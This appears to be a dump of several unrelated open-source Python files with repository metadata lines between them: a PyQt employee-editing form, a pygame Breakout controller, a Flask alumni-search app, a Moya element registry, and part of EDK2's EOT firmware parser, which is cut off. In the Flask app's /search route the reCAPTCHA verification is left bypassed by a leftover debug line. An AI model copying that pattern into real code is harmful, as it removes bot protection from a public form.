self.cmbCargo.setObjectName(_fromUtf8("cmbCargo"))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.formLayout_2.setWidget(4, QtGui.QFormLayout.FieldRole, self.cmbCargo)
self.lblNivel = QtGui.QLabel(self.groupBox_2)
self.lblNivel.setObjectName(_fromUtf8("lblNivel"))
self.formLayout_2.setWidget(6, QtGui.QFormLayout.LabelRole, self.lblNivel)
self.leNivel = QtGui.QLineEdit(self.groupBox_2)
self.leNivel.setObjectName(_fromUtf8("leNivel"))
self.formLayout_2.setWidget(6, QtGui.QFormLayout.FieldRole, self.leNivel)
self.horizontalLayout.addWidget(self.groupBox_2)
self.verticalLayout.addLayout(self.horizontalLayout)
self.buttonBox = QtGui.QDialogButtonBox(Editar)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(Editar)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("accepted()")), Editar.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("rejected()")), Editar.reject)
QtCore.QMetaObject.connectSlotsByName(Editar)
def retranslateUi(self, Editar):
Editar.setWindowTitle(QtGui.QApplication.translate("Editar", "Editar empleado", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox.setTitle(QtGui.QApplication.translate("Editar", "Datos personales", None, QtGui.QApplication.UnicodeUTF8))
self.lblNombre.setText(QtGui.QApplication.translate("Editar", "Nombre:", None, QtGui.QApplication.UnicodeUTF8))
self.lblApellido.setText(QtGui.QApplication.translate("Editar", "Apellido:", None, QtGui.QApplication.UnicodeUTF8))
self.lblFechaNacimiento.setText(QtGui.QApplication.translate("Editar", "F. Nacimiento:", None, QtGui.QApplication.UnicodeUTF8))
self.deFechaNacimiento.setDisplayFormat(QtGui.QApplication.translate("Editar", "dd/MM/yyyy", None, QtGui.QApplication.UnicodeUTF8))
self.lblGenero.setText(QtGui.QApplication.translate("Editar", "Género:", None, QtGui.QApplication.UnicodeUTF8))
self.cmbGenero.setItemText(0, QtGui.QApplication.translate("Editar", "Femenino", None, QtGui.QApplication.UnicodeUTF8))
self.cmbGenero.setItemText(1, QtGui.QApplication.translate("Editar", "Masculino", None, QtGui.QApplication.UnicodeUTF8))
self.lblCuil.setText(QtGui.QApplication.translate("Editar", "Cuil:", None, QtGui.QApplication.UnicodeUTF8))
self.lblTelefono.setText(QtGui.QApplication.translate("Editar", "Teléfono:", None, QtGui.QApplication.UnicodeUTF8))
self.lblDomicilio.setText(QtGui.QApplication.translate("Editar", "Domicilio:", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_2.setTitle(QtGui.QApplication.translate("Editar", "Datos laborales", None, QtGui.QApplication.UnicodeUTF8))
self.lblNroLegajo.setText(QtGui.QApplication.translate("Editar", "Nro. Legajo:", None, QtGui.QApplication.UnicodeUTF8))
self.lblFechaIngreso.setText(QtGui.QApplication.translate("Editar", "Ingreso:", None, QtGui.QApplication.UnicodeUTF8))
self.deFechaIngreso.setDisplayFormat(QtGui.QApplication.translate("Editar", "dd/MM/yyyy", None, QtGui.QApplication.UnicodeUTF8))
self.lblRevista.setText(QtGui.QApplication.translate("Editar", "Sit. de Revista:", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(0, QtGui.QApplication.translate("Editar", "Comisión", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(1, QtGui.QApplication.translate("Editar", "Pasantía", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(2, QtGui.QApplication.translate("Editar", "Permanente", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(3, QtGui.QApplication.translate("Editar", "Temporaria", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(4, QtGui.QApplication.translate("Editar", "Transitoria", None, QtGui.QApplication.UnicodeUTF8))
self.lblCargo.setText(QtGui.QApplication.translate("Editar", "Cargo:", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(0, QtGui.QApplication.translate("Editar", "Administrativo", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(1, QtGui.QApplication.translate("Editar", "Jerárquico", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(2, QtGui.QApplication.translate("Editar", "Obrero", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(3, QtGui.QApplication.translate("Editar", "Profesional", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(4, QtGui.QApplication.translate("Editar", "Servicio", None, QtGui.QApplication.UnicodeUTF8))
self.lblNivel.setText(QtGui.QApplication.translate("Editar", "Nivel:", None, QtGui.QApplication.UnicodeUTF8))
|
mit
| 4,544,980,707,808,152,000 | 68.595238 | 139 | 0.729644 | false |
felipead/breakout
|
source/breakout/game/GameController.py
|
1
|
4147
|
from OpenGL.GL import *
from OpenGL.GLU import *
import pygame
from pygame.constants import *
from breakout.game.GameEngine import GameEngine
_FRAMES_PER_SECOND = 60
_MOUSE_VISIBLE = True
_CANVAS_WIDTH = 250
_CANVAS_HEIGHT = 300
_DEFAULT_SCREEN_WIDTH = 500
_DEFAULT_SCREEN_HEIGHT = 600
class GameController(object):
def __init__(self):
self.__engine = GameEngine(_CANVAS_WIDTH, _CANVAS_HEIGHT)
self.__screenWidth = _DEFAULT_SCREEN_WIDTH
self.__screenHeight = _DEFAULT_SCREEN_HEIGHT
def run(self):
self.__initialize()
self.__gameLoop()
def __initialize(self):
pygame.init()
pygame.mouse.set_visible(_MOUSE_VISIBLE)
pygame.display.set_mode((self.__screenWidth, self.__screenHeight), OPENGL | DOUBLEBUF)
glClearColor(0.0, 0.0, 0.0, 1.0)
glShadeModel(GL_FLAT)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glBlendEquation(GL_FUNC_ADD)
self.__handleScreenResizeEvent(self.__screenWidth, self.__screenHeight)
self.__engine.initialize()
def __gameLoop(self):
clock = pygame.time.Clock()
ticks = 0
while True:
for event in pygame.event.get():
self.__handleInputEvent(event)
milliseconds = clock.tick(_FRAMES_PER_SECOND)
ticks += 1
self.__engine.update(milliseconds, ticks)
self.__engine.display(milliseconds, ticks, self.__screenWidth, self.__screenHeight, clock.get_fps())
pygame.display.flip() # swap buffers
def __handleInputEvent(self, event):
if event.type == QUIT:
exit()
elif event.type == VIDEORESIZE:
self.__handleScreenResizeEvent(event.w, event.h)
elif event.type == MOUSEMOTION:
self.__handleMouseMoveEvent(event.pos, event.rel, event.buttons)
elif event.type == MOUSEBUTTONUP:
self.__handleMouseButtonUpEvent(event.button, event.pos)
elif event.type == MOUSEBUTTONDOWN:
self.__handleMouseButtonDownEvent(event.button, event.pos)
elif event.type == KEYUP:
self.__handleKeyUpEvent(event.key, event.mod)
elif event.type == KEYDOWN:
self.__handleKeyDownEvent(event.key, event.mod, event.unicode)
def __handleScreenResizeEvent(self, width, height):
self.__screenWidth = width
self.__screenHeight = height
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(self.__engine.canvas.left, self.__engine.canvas.right,
self.__engine.canvas.bottom, self.__engine.canvas.top)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def __handleMouseButtonUpEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonUpEvent(button, mappedCoordinates)
def __handleMouseButtonDownEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonDownEvent(button, mappedCoordinates)
def __handleMouseMoveEvent(self, absolute_coordinates, relative_coordinates, buttons):
mapped_absolute_coordinates = self.__mapScreenCoordinatesToCanvas(absolute_coordinates)
self.__engine.handleMouseMoveEvent(mapped_absolute_coordinates, relative_coordinates, buttons)
def __handleKeyUpEvent(self, key, modifiers):
self.__engine.handleKeyUpEvent(key, modifiers)
def __handleKeyDownEvent(self, key, modifiers, char):
self.__engine.handleKeyDownEvent(key, modifiers, char)
def __mapScreenCoordinatesToCanvas(self, coordinates):
horizontalCanvasToScreenRatio = self.__engine.canvas.width / float(self.__screenWidth)
verticalCanvasToScreenRatio = self.__engine.canvas.height / float(self.__screenHeight)
(x, y) = coordinates
x *= horizontalCanvasToScreenRatio
y *= verticalCanvasToScreenRatio
y = self.__engine.canvas.top - y
return x, y
|
gpl-2.0
| 2,273,906,769,018,133,000 | 35.699115 | 112 | 0.661201 | false |
rohitsm/spsoldboys
|
main.py
|
1
|
4255
|
"""`main` is the top level module for your Flask application."""
__author__ = 'rohitsm'
__page__ = 'https://github.com/rohitsm/spsoldboys'
# Python
import urllib2
import json
import sys
import cgi
# Flask
from flask import Flask
from flask import request, redirect, url_for
from flask import render_template
# App Engine
from google.appengine.ext import ndb
import logging
# Application related files
import config
from db import Oldboy
app = Flask(__name__, static_url_path='/static')
# URL format: recaptcha_url? + secret=your_secret & response=response_string&remoteip=user_ip_address'
recaptcha_url = 'https://www.google.com/recaptcha/api/siteverify'
# ReCAPTCHA secret key
recaptcha_secret = config.conf['SHARED_KEY']
def verify_captcha(recaptcha_response):
res = recaptcha_url + \
"?secret=" + recaptcha_secret + \
"&response=" + recaptcha_response
# resp = True|False Type=bool
resp = json.load(urllib2.urlopen(res))["success"]
# print "resp[success] = %r" %resp
return resp
@app.route('/')
def index():
"""Return a friendly HTTP greeting."""
# To add entry to DB, uncomment below line. set_record() reads from csv input.
# num_of_records = Oldboy.set_record()
# print "No of records written = " + str(num_of_records)
# return "helloWorld!"
return render_template('index.html')
@app.route('/search', methods=['GET', 'POST'])
def authentication():
# Verify reCaptcha input and render page correctly if captcha verified
if request.method == 'POST':
if(verify_captcha(request.form['g-recaptcha-response'])):
return render_template('search.html')
return render_template('search.html') #Delete this line and uncomment 2 above
# For GET requests
return redirect(url_for('index'))
# Send data from DB to 'results' page
@app.route('/results', methods=['GET', 'POST'])
def search_request():
# Get search terms
record = []
# For table headers of HTML tables
headers = {}
if request.method == 'POST':
try:
firstName = cgi.escape(request.form['firstname'], True).lower().replace(' ', '')
lastName = cgi.escape(request.form['lastname'], True).lower().replace(' ', '')
year = cgi.escape(request.form['year'], True)
# print 'firstname = %s \nlastName = %s, \nyear =%s ' %(firstName, lastName, year)
if(not year):
year = None
if( (not firstName) or (firstName.isspace()) ):
firstName = None
if( (not lastName) or (lastName.isspace()) ):
lastName = None
# Retrieve query from the datastore.
# record = DB query results
# header = for rendering table headers
record = Oldboy.get_record(firstName, lastName, year)
# print "record = %s" %(record)
if (record is not None):
count = len(record)
headers = record[0]
# Records sorted by Last names
sorted_records = sorted(record, key=lambda k: k['Last Name'])
# print "Dict = ", sorted_records
return render_template('results.html', records = sorted_records, \
headers = headers, \
count = count)
return render_template('notfound.html')
except Exception as e:
print "Woah horsey! This shouldn't be happening!"
logging.error(sys.exc_info())
print e
# Redirect to "not_found" page
return render_template('notfound.html')
# For GET requests
return redirect(url_for('index'))
@app.route('/addrecord')
def addrecord():
""" Page contains Google form embedded for entering new record."""
return render_template('addrecord.html')
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, Nothing at this URL.', 404
@app.errorhandler(500)
def page_not_found(e):
"""Return a custom 500 error."""
return 'Sorry, unexpected error: {}'.format(e), 500
|
mit
| 7,525,898,457,323,794,000 | 29.611511 | 102 | 0.594595 | false |
moyaproject/moya
|
moya/elements/registry.py
|
1
|
4712
|
from __future__ import unicode_literals
from .. import errors
from ..tools import extract_namespace
from .. import namespaces
from ..compat import itervalues
from collections import defaultdict
import inspect
class Meta(object):
logic_skip = False
virtual_tag = False
is_call = False
is_try = False
is_loop = False
app_first_arg = False
text_nodes = None
trap_exceptions = False
translate = False
class ElementRegistry(object):
default_registry = None
_registry_stack = []
def clear(self):
self._registry.clear()
self._dynamic_elements.clear()
del self._registry_stack[:]
@classmethod
def push_registry(cls, registry):
cls._registry_stack.append(registry)
@classmethod
def pop_registry(cls):
cls._registry_stack.pop()
@classmethod
def get_default(cls):
return cls._registry_stack[-1]
def __init__(self, update_from_default=True):
self._registry = defaultdict(dict)
self._dynamic_elements = {}
if update_from_default:
self._registry.update(self.default_registry._registry)
self._dynamic_elements.update(self.default_registry._dynamic_elements)
def clone(self):
"""Return a copy of this registry"""
registry = ElementRegistry(update_from_default=False)
registry._registry = self._registry.copy()
registry._dynamic_elements = self._dynamic_elements.copy()
return registry
def set_default(self):
"""Reset this registry to the default registry (before project loaded)"""
self._registry = self.default_registry._registry.copy()
self._dynamic_elements = self.default_registry._dynamic_elements.copy()
def register_element(self, xmlns, name, element):
"""Add a dynamic element to the element registry"""
xmlns = xmlns or namespaces.run
if name in self._registry[xmlns]:
element_class = self._registry[xmlns][name]
definition = getattr(element_class, "_location", None)
if definition is None:
definition = inspect.getfile(element_class)
if xmlns:
raise errors.ElementError(
'<{}> already registered in "{}" for xmlns "{}"'.format(
name, definition, xmlns
),
element=getattr(element, "element", element),
)
else:
raise errors.ElementError(
'<{}/> already registered in "{}"'.format(name, definition),
element=element,
)
self._registry[xmlns][name] = element
def add_dynamic_registry(self, xmlns, element_callable):
"""Add a dynamic registry (element factory)"""
self._dynamic_elements[xmlns] = element_callable
def clear_registry(self):
"""Clear the registry (called on archive reload)"""
self._registry.clear()
def get_elements_in_xmlns(self, xmlns):
"""Get all elements defined within a given namespace"""
return self._registry.get(xmlns, {})
def get_elements_in_lib(self, long_name):
"""Get all elements defined by a given library"""
lib_elements = []
for namespace in itervalues(self._registry):
lib_elements.extend(
element
for element in itervalues(namespace)
if element._lib_long_name == long_name
)
return lib_elements
def get_element_type(self, xmlns, name):
"""Get an element by namespace and name"""
if xmlns in self._dynamic_elements:
return self._dynamic_elements[xmlns](name)
return self._registry.get(xmlns, {}).get(name, None)
def find_xmlns(self, name):
"""Find the xmlns with contain a given tag, or return None"""
for xmlns in sorted(self._registry.keys()):
if name in self._registry[xmlns]:
return xmlns
return None
def check_namespace(self, xmlns):
"""Check if a namespace exists in the registry"""
return xmlns in self._registry
def set_registry(self, registry):
"""Restore a saved registry"""
self._registry = registry._registry.copy()
self._dynamic_elements = registry._dynamic_elements.copy()
def get_tag(self, tag):
"""Get a tag from it's name (in Clarke's notation)"""
return self.get_element_type(*extract_namespace(tag))
default_registry = ElementRegistry.default_registry = ElementRegistry(
update_from_default=False
)
ElementRegistry.push_registry(ElementRegistry.default_registry)
|
mit
| -1,306,243,355,464,368,600 | 31.951049 | 82 | 0.610781 | false |
MattDevo/edk2
|
BaseTools/Source/Python/Eot/EotMain.py
|
1
|
69215
|
## @file
# This file is used to be the main entrance of EOT tool
#
# Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import Common.LongFilePathOs as os, time, glob
import Common.EdkLogger as EdkLogger
import Eot.EotGlobalData as EotGlobalData
from optparse import OptionParser
from Common.StringUtils import NormPath
from Common import BuildToolError
from Common.Misc import GuidStructureStringToGuidString, sdict
from Eot.Parser import *
from Eot.InfParserLite import EdkInfParser
from Common.StringUtils import GetSplitValueList
from Eot import c
from Eot import Database
from array import array
from Eot.Report import Report
from Common.BuildVersion import gBUILD_VERSION
from Eot.Parser import ConvertGuid
from Common.LongFilePathSupport import OpenLongFilePath as open
import struct
import uuid
import copy
import codecs
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
gGuidStringFormat = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X"
gIndention = -4
class Image(array):
_HEADER_ = struct.Struct("")
_HEADER_SIZE_ = _HEADER_.size
def __new__(cls, *args, **kwargs):
return array.__new__(cls, 'B')
def __init__(self, ID=None):
if ID is None:
self._ID_ = str(uuid.uuid1()).upper()
else:
self._ID_ = ID
self._BUF_ = None
self._LEN_ = None
self._OFF_ = None
self._SubImages = sdict() # {offset: Image()}
array.__init__(self)
def __repr__(self):
return self._ID_
def __len__(self):
Len = array.__len__(self)
for Offset in self._SubImages.keys():
Len += len(self._SubImages[Offset])
return Len
def _Unpack(self):
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _Pack(self, PadByte=0xFF):
raise NotImplementedError
def frombuffer(self, Buffer, Offset=0, Size=None):
self._BUF_ = Buffer
self._OFF_ = Offset
# we may need the Size information in advance if it's given
self._LEN_ = Size
self._LEN_ = self._Unpack()
def empty(self):
del self[0:]
def GetField(self, FieldStruct, Offset=0):
return FieldStruct.unpack_from(self, Offset)
def SetField(self, FieldStruct, Offset, *args):
# check if there's enough space
Size = FieldStruct.size
if Size > len(self):
self.extend([0] * (Size - len(self)))
FieldStruct.pack_into(self, Offset, *args)
def _SetData(self, Data):
if len(self) < self._HEADER_SIZE_:
self.extend([0] * (self._HEADER_SIZE_ - len(self)))
else:
del self[self._HEADER_SIZE_:]
self.extend(Data)
def _GetData(self):
if len(self) > self._HEADER_SIZE_:
return self[self._HEADER_SIZE_:]
return None
Data = property(_GetData, _SetData)
## CompressedImage() class
#
# A class for Compressed Image
#
class CompressedImage(Image):
# UncompressedLength = 4-byte
# CompressionType = 1-byte
_HEADER_ = struct.Struct("1I 1B")
_HEADER_SIZE_ = _HEADER_.size
_ORIG_SIZE_ = struct.Struct("1I")
_CMPRS_TYPE_ = struct.Struct("4x 1B")
def __init__(self, CompressedData=None, CompressionType=None, UncompressedLength=None):
Image.__init__(self)
if UncompressedLength is not None:
self.UncompressedLength = UncompressedLength
if CompressionType is not None:
self.CompressionType = CompressionType
if CompressedData is not None:
self.Data = CompressedData
def __str__(self):
global gIndention
S = "algorithm=%s uncompressed=%x" % (self.CompressionType, self.UncompressedLength)
for Sec in self.Sections:
S += '\n' + str(Sec)
return S
def _SetOriginalSize(self, Size):
self.SetField(self._ORIG_SIZE_, 0, Size)
def _GetOriginalSize(self):
return self.GetField(self._ORIG_SIZE_)[0]
def _SetCompressionType(self, Type):
self.SetField(self._CMPRS_TYPE_, 0, Type)
def _GetCompressionType(self):
return self.GetField(self._CMPRS_TYPE_)[0]
def _GetSections(self):
try:
TmpData = DeCompress('Efi', self[self._HEADER_SIZE_:])
DecData = array('B')
DecData.fromstring(TmpData)
except:
TmpData = DeCompress('Framework', self[self._HEADER_SIZE_:])
DecData = array('B')
DecData.fromstring(TmpData)
SectionList = []
Offset = 0
while Offset < len(DecData):
Sec = Section()
try:
Sec.frombuffer(DecData, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
except:
break
SectionList.append(Sec)
return SectionList
UncompressedLength = property(_GetOriginalSize, _SetOriginalSize)
CompressionType = property(_GetCompressionType, _SetCompressionType)
Sections = property(_GetSections)
## Ui() class
#
# A class for Ui
#
class Ui(Image):
_HEADER_ = struct.Struct("")
_HEADER_SIZE_ = 0
def __init__(self):
Image.__init__(self)
def __str__(self):
return self.String
def _Unpack(self):
# keep header in this Image object
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _GetUiString(self):
return codecs.utf_16_decode(self[0:-2].tostring())[0]
String = property(_GetUiString)
## Depex() class
#
# A class for Depex
#
class Depex(Image):
_HEADER_ = struct.Struct("")
_HEADER_SIZE_ = 0
_GUID_ = struct.Struct("1I2H8B")
_OPCODE_ = struct.Struct("1B")
_OPCODE_STRING_ = {
0x00 : "BEFORE",
0x01 : "AFTER",
0x02 : "PUSH",
0x03 : "AND",
0x04 : "OR",
0x05 : "NOT",
0x06 : "TRUE",
0x07 : "FALSE",
0x08 : "END",
0x09 : "SOR"
}
_NEXT_ = {
-1 : _OPCODE_, # first one in depex must be an opcdoe
0x00 : _GUID_, #"BEFORE",
0x01 : _GUID_, #"AFTER",
0x02 : _GUID_, #"PUSH",
0x03 : _OPCODE_, #"AND",
0x04 : _OPCODE_, #"OR",
0x05 : _OPCODE_, #"NOT",
0x06 : _OPCODE_, #"TRUE",
0x07 : _OPCODE_, #"FALSE",
0x08 : None, #"END",
0x09 : _OPCODE_, #"SOR"
}
def __init__(self):
Image.__init__(self)
self._ExprList = []
def __str__(self):
global gIndention
gIndention += 4
Indention = ' ' * gIndention
S = '\n'
for T in self.Expression:
if T in self._OPCODE_STRING_:
S += Indention + self._OPCODE_STRING_[T]
if T not in [0x00, 0x01, 0x02]:
S += '\n'
else:
S += ' ' + gGuidStringFormat % T + '\n'
gIndention -= 4
return S
def _Unpack(self):
# keep header in this Image object
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _GetExpression(self):
if self._ExprList == []:
Offset = 0
CurrentData = self._OPCODE_
while Offset < len(self):
Token = CurrentData.unpack_from(self, Offset)
Offset += CurrentData.size
if len(Token) == 1:
Token = Token[0]
if Token in self._NEXT_:
CurrentData = self._NEXT_[Token]
else:
CurrentData = self._GUID_
else:
CurrentData = self._OPCODE_
self._ExprList.append(Token)
if CurrentData is None:
break
return self._ExprList
Expression = property(_GetExpression)
# # FirmwareVolume() class
#
# A class for Firmware Volume
#
class FirmwareVolume(Image):
# Read FvLength, Attributes, HeaderLength, Checksum
_HEADER_ = struct.Struct("16x 1I2H8B 1Q 4x 1I 1H 1H")
_HEADER_SIZE_ = _HEADER_.size
_FfsGuid = "8C8CE578-8A3D-4F1C-9935-896185C32DD3"
_GUID_ = struct.Struct("16x 1I2H8B")
_LENGTH_ = struct.Struct("16x 16x 1Q")
_SIG_ = struct.Struct("16x 16x 8x 1I")
_ATTR_ = struct.Struct("16x 16x 8x 4x 1I")
_HLEN_ = struct.Struct("16x 16x 8x 4x 4x 1H")
_CHECKSUM_ = struct.Struct("16x 16x 8x 4x 4x 2x 1H")
def __init__(self, Name=''):
Image.__init__(self)
self.Name = Name
self.FfsDict = sdict()
self.OrderedFfsDict = sdict()
self.UnDispatchedFfsDict = sdict()
self.ProtocolList = sdict()
def CheckArchProtocol(self):
for Item in EotGlobalData.gArchProtocolGuids:
if Item.lower() not in EotGlobalData.gProtocolList:
return False
return True
def ParseDepex(self, Depex, Type):
List = None
if Type == 'Ppi':
List = EotGlobalData.gPpiList
if Type == 'Protocol':
List = EotGlobalData.gProtocolList
DepexStack = []
DepexList = []
DepexString = ''
FileDepex = None
CouldBeLoaded = True
for Index in range(0, len(Depex.Expression)):
Item = Depex.Expression[Index]
if Item == 0x00:
Index = Index + 1
Guid = gGuidStringFormat % Depex.Expression[Index]
if Guid in self.OrderedFfsDict and Depex.Expression[Index + 1] == 0x08:
return (True, 'BEFORE %s' % Guid, [Guid, 'BEFORE'])
elif Item == 0x01:
Index = Index + 1
Guid = gGuidStringFormat % Depex.Expression[Index]
if Guid in self.OrderedFfsDict and Depex.Expression[Index + 1] == 0x08:
return (True, 'AFTER %s' % Guid, [Guid, 'AFTER'])
elif Item == 0x02:
Index = Index + 1
Guid = gGuidStringFormat % Depex.Expression[Index]
if Guid.lower() in List:
DepexStack.append(True)
DepexList.append(Guid)
else:
DepexStack.append(False)
DepexList.append(Guid)
continue
elif Item == 0x03 or Item == 0x04:
DepexStack.append(eval(str(DepexStack.pop()) + ' ' + Depex._OPCODE_STRING_[Item].lower() + ' ' + str(DepexStack.pop())))
DepexList.append(str(DepexList.pop()) + ' ' + Depex._OPCODE_STRING_[Item].upper() + ' ' + str(DepexList.pop()))
elif Item == 0x05:
DepexStack.append(eval(Depex._OPCODE_STRING_[Item].lower() + ' ' + str(DepexStack.pop())))
DepexList.append(Depex._OPCODE_STRING_[Item].lower() + ' ' + str(DepexList.pop()))
elif Item == 0x06:
DepexStack.append(True)
DepexList.append('TRUE')
DepexString = DepexString + 'TRUE' + ' '
elif Item == 0x07:
DepexStack.append(False)
DepexList.append('False')
DepexString = DepexString + 'FALSE' + ' '
elif Item == 0x08:
if Index != len(Depex.Expression) - 1:
CouldBeLoaded = False
else:
CouldBeLoaded = DepexStack.pop()
else:
CouldBeLoaded = False
if DepexList != []:
DepexString = DepexList[0].strip()
return (CouldBeLoaded, DepexString, FileDepex)
def Dispatch(self, Db=None):
if Db is None:
return False
self.UnDispatchedFfsDict = copy.copy(self.FfsDict)
# Find PeiCore, DexCore, PeiPriori, DxePriori first
FfsSecCoreGuid = None
FfsPeiCoreGuid = None
FfsDxeCoreGuid = None
FfsPeiPrioriGuid = None
FfsDxePrioriGuid = None
for FfsID in self.UnDispatchedFfsDict.keys():
Ffs = self.UnDispatchedFfsDict[FfsID]
if Ffs.Type == 0x03:
FfsSecCoreGuid = FfsID
continue
if Ffs.Type == 0x04:
FfsPeiCoreGuid = FfsID
continue
if Ffs.Type == 0x05:
FfsDxeCoreGuid = FfsID
continue
if Ffs.Guid.lower() == PEI_APRIORI_GUID.lower():
FfsPeiPrioriGuid = FfsID
continue
if Ffs.Guid.lower() == DXE_APRIORI_GUID.lower():
FfsDxePrioriGuid = FfsID
continue
# Parse SEC_CORE first
if FfsSecCoreGuid is not None:
self.OrderedFfsDict[FfsSecCoreGuid] = self.UnDispatchedFfsDict.pop(FfsSecCoreGuid)
self.LoadPpi(Db, FfsSecCoreGuid)
# Parse PEI first
if FfsPeiCoreGuid is not None:
self.OrderedFfsDict[FfsPeiCoreGuid] = self.UnDispatchedFfsDict.pop(FfsPeiCoreGuid)
self.LoadPpi(Db, FfsPeiCoreGuid)
if FfsPeiPrioriGuid is not None:
# Load PEIM described in priori file
FfsPeiPriori = self.UnDispatchedFfsDict.pop(FfsPeiPrioriGuid)
if len(FfsPeiPriori.Sections) == 1:
Section = FfsPeiPriori.Sections.popitem()[1]
if Section.Type == 0x19:
GuidStruct = struct.Struct('1I2H8B')
Start = 4
while len(Section) > Start:
Guid = GuidStruct.unpack_from(Section[Start : Start + 16])
GuidString = gGuidStringFormat % Guid
Start = Start + 16
if GuidString in self.UnDispatchedFfsDict:
self.OrderedFfsDict[GuidString] = self.UnDispatchedFfsDict.pop(GuidString)
self.LoadPpi(Db, GuidString)
self.DisPatchPei(Db)
# Parse DXE then
if FfsDxeCoreGuid is not None:
self.OrderedFfsDict[FfsDxeCoreGuid] = self.UnDispatchedFfsDict.pop(FfsDxeCoreGuid)
self.LoadProtocol(Db, FfsDxeCoreGuid)
if FfsDxePrioriGuid is not None:
# Load PEIM described in priori file
FfsDxePriori = self.UnDispatchedFfsDict.pop(FfsDxePrioriGuid)
if len(FfsDxePriori.Sections) == 1:
Section = FfsDxePriori.Sections.popitem()[1]
if Section.Type == 0x19:
GuidStruct = struct.Struct('1I2H8B')
Start = 4
while len(Section) > Start:
Guid = GuidStruct.unpack_from(Section[Start : Start + 16])
GuidString = gGuidStringFormat % Guid
Start = Start + 16
if GuidString in self.UnDispatchedFfsDict:
self.OrderedFfsDict[GuidString] = self.UnDispatchedFfsDict.pop(GuidString)
self.LoadProtocol(Db, GuidString)
self.DisPatchDxe(Db)
def LoadProtocol(self, Db, ModuleGuid):
SqlCommand = """select GuidValue from Report
where SourceFileFullPath in
(select Value1 from Inf where BelongsToFile =
(select BelongsToFile from Inf
where Value1 = 'FILE_GUID' and Value2 like '%s' and Model = %s)
and Model = %s)
and ItemType = 'Protocol' and ItemMode = 'Produced'""" \
% (ModuleGuid, 5001, 3007)
RecordSet = Db.TblReport.Exec(SqlCommand)
for Record in RecordSet:
SqlCommand = """select Value2 from Inf where BelongsToFile =
(select DISTINCT BelongsToFile from Inf
where Value1 =
(select SourceFileFullPath from Report
where GuidValue like '%s' and ItemMode = 'Callback'))
and Value1 = 'FILE_GUID'""" % Record[0]
CallBackSet = Db.TblReport.Exec(SqlCommand)
if CallBackSet != []:
EotGlobalData.gProtocolList[Record[0].lower()] = ModuleGuid
else:
EotGlobalData.gProtocolList[Record[0].lower()] = ModuleGuid
def LoadPpi(self, Db, ModuleGuid):
SqlCommand = """select GuidValue from Report
where SourceFileFullPath in
(select Value1 from Inf where BelongsToFile =
(select BelongsToFile from Inf
where Value1 = 'FILE_GUID' and Value2 like '%s' and Model = %s)
and Model = %s)
and ItemType = 'Ppi' and ItemMode = 'Produced'""" \
% (ModuleGuid, 5001, 3007)
RecordSet = Db.TblReport.Exec(SqlCommand)
for Record in RecordSet:
EotGlobalData.gPpiList[Record[0].lower()] = ModuleGuid
def DisPatchDxe(self, Db):
IsInstalled = False
ScheduleList = sdict()
for FfsID in self.UnDispatchedFfsDict.keys():
CouldBeLoaded = False
DepexString = ''
FileDepex = None
Ffs = self.UnDispatchedFfsDict[FfsID]
if Ffs.Type == 0x07:
# Get Depex
IsFoundDepex = False
for Section in Ffs.Sections.values():
# Find Depex
if Section.Type == 0x13:
IsFoundDepex = True
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(Section._SubImages[4], 'Protocol')
break
if Section.Type == 0x01:
CompressSections = Section._SubImages[4]
for CompressSection in CompressSections.Sections:
if CompressSection.Type == 0x13:
IsFoundDepex = True
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(CompressSection._SubImages[4], 'Protocol')
break
if CompressSection.Type == 0x02:
